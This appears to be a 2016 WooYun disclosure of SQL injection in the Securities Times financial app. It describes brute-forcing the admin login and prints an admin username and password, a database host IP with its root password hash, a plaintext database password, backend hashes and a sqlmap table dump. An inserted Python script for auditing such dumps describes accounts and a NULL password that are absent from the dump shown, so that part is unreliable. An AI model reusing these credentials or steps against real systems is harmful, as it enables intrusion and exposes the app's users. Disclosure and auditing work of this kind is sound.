
Defect ID: wooyun-2016-0215855

Title: Securities Times app SQL injection affects all registered users

Related vendor: stcn.com

Author: 艺术家

Submitted: 2016-06-03 16:23

Fixed: 2016-07-18 16:50

Published: 2016-07-18 16:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-06-03: Details sent to the vendor, awaiting vendor action
2016-06-03: Vendor confirmed; details visible to the vendor only
2016-06-13: Details disclosed to core white hats and domain experts
2016-06-23: Details disclosed to regular white hats
2016-07-03: Details disclosed to intern white hats
2016-07-18: Details disclosed to the public

Brief description:

See title.

Detailed description:

WooYun: Securities Times vulnerability (involving the app, database, securities, stock trends, etc.)
Following that report, the app's admin backend can be located; in fact that is not even needed, since it can be found directly inside the app:
http://appzd.zxzx.stcn.com/admin/admin/adminLogin.do
At this login page the username can be brute-forced because the captcha check is broken, so the brute force succeeded directly.

lidongping  123456


Logged in.

1.png


Found the SQL injection:

back-end DBMS: MySQL 5.0
Database: zhengquanshibaoapp
[79 tables]
+-----------------------------------------+
| bt_config |
| bt_rights |
| t_admin |
| t_banner |
| t_blocks |
| t_category |
| t_category_common |
| t_combination |
| t_combination_common |
| t_combination_favorite |
| t_combination_read |
| t_common |
| t_common_prev |
| t_favorable |
| t_favorable_category |
| t_folder |
| t_folder_rights |
| t_identity |
| t_identity_role |
| t_message |
| t_message_user |
| t_new_case |
| t_newcase_read |
| t_order |
| t_orderItem |
| t_region |
| t_role |
| t_role_rights |
| t_socket_news |
| t_symbol |
| t_tencentpost |
| t_token |
| t_user |
| t_user_category |
| t_user_device |
| t_user_track_Spider |
| t_user_track_lyc |
| t_v_combinationfavorite |
| test_c3p0 |
| v_t_admin |
| v_t_app_user_order_category |
| v_t_article_category |
| v_t_blocks_admin |
| v_t_blocks_category |
| v_t_category_common_block |
| v_t_category_common_combination_commmon |
| v_t_category_favorable |
| v_t_combination_category |
| v_t_combination_category_all |
| v_t_combination_category_all_app |
| v_t_combination_category_user |
| v_t_combination_common |
| v_t_combination_common_category |
| v_t_combination_common_top |
| v_t_combination_preview |
| v_t_combination_read |
| v_t_combination_read_app |
| v_t_combination_user_read |
| v_t_common_admin |
| v_t_common_category_admin |
| v_t_common_prev_admin |
| v_t_config_admin |
| v_t_folder_rights |
| v_t_folder_rights_role |
| v_t_message_admin |
| v_t_message_no_user |
| v_t_message_user |
| v_t_message_user_admin |
| v_t_message_user_admin_sta |
| v_t_order_orderItem |
| v_t_order_orderitem |
| v_t_role_identity |
| v_t_role_rights_menu |
| v_t_statistics |
| v_t_symbol_admin |
| v_t_user_device_info |
| v_t_user_order_category |
| v_t_user_order_orderItem |
| v_t_user_region |
+-----------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind


Dumped the following:
database management system users password hashes:
Database password from earlier:
Quattro!
Database credentials: the database host is 115.29.185.90, the account is root, and the password is B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2.
Backend accounts:
liuyufeng e24d3a6718be9dd73a94a3277c8ee6fa
hemin 143e4ff1b57893f8a62fb729cfa187f6
Into the backend:

3.png


4.png


6.png


Affects all users of the app.
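The user and hash dump above shows the three weaknesses a DBA should be auditing for before a report like this lands: accounts with empty (NULL) passwords, one password hash reused by several accounts (root, zqsb_app and zqsbapp share a hash here), and root logins permitted from remote hosts. The following is an added example, not code from the report or the vendor: it parses sqlmap-style `--users`/`--passwords` output and flags those conditions. The sample dump, its hashes and hosts are constructed placeholders, not the page's values.

```python
import re
from collections import defaultdict

# Constructed sample in the same layout as sqlmap's --passwords / --users
# output. Hashes and hosts are made-up placeholders, not the page's values.
SAMPLE_DUMP = """\
database management system users password hashes:
[*] readonly [1]:
    password hash: NULL
[*] root [3]:
    password hash: *AAAA000000000000000000000000000000000001
    password hash: *AAAA000000000000000000000000000000000002
    password hash: NULL
[*] app_rw [1]:
    password hash: *AAAA000000000000000000000000000000000002
[*] 'readonly'@'10.0.0.5'
[*] 'root'@'localhost'
[*] 'root'@'203.0.113.9'
[*] 'app_rw'@'10.0.0.5'
"""

USER_HDR = re.compile(r"^\[\*\] (\S+) \[\d+\]:$")        # "[*] root [3]:"
HASH_LINE = re.compile(r"^\s*password hash: (\S+)")      # trailing notes ignored
HOST_LINE = re.compile(r"^\[\*\] '([^']*)'@'([^']*)'$")  # "[*] 'root'@'host'"
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1", "localhost.localdomain"}

def parse_dump(text):
    """Return ({user: [hashes]}, [(user, host)]) from sqlmap-style output."""
    hashes, hosts, current = defaultdict(list), [], None
    for line in text.splitlines():
        if m := USER_HDR.match(line):
            current = m.group(1)
        elif (m := HASH_LINE.match(line)) and current:
            hashes[current].append(m.group(1))
        elif m := HOST_LINE.match(line):
            hosts.append((m.group(1), m.group(2)))
    return dict(hashes), hosts

def audit(text):
    """Flag empty passwords, hashes shared by several accounts, remote root."""
    hashes, hosts = parse_dump(text)
    owners = defaultdict(set)  # hash -> accounts that use it
    for user, hs in hashes.items():
        for h in hs:
            owners[h].add(user)
    findings = [f"empty password: {u}" for u in sorted(owners.pop("NULL", set()))]
    findings += [f"hash reused by {sorted(us)}" for h, us in owners.items() if len(us) > 1]
    findings += [f"root reachable from {host}" for user, host in hosts
                 if user == "root" and host not in LOCAL_HOSTS]
    return findings
```

The same checks can be run directly against `SELECT user, host, authentication_string FROM mysql.user` on a server you administer, without sqlmap involved.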

Proof of concept:


Fix recommendation:

Copyright notice: please credit 艺术家@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2016-06-03 16:45

Vendor reply:

Please do not disclose this; we are fixing it.

Latest status:

None yet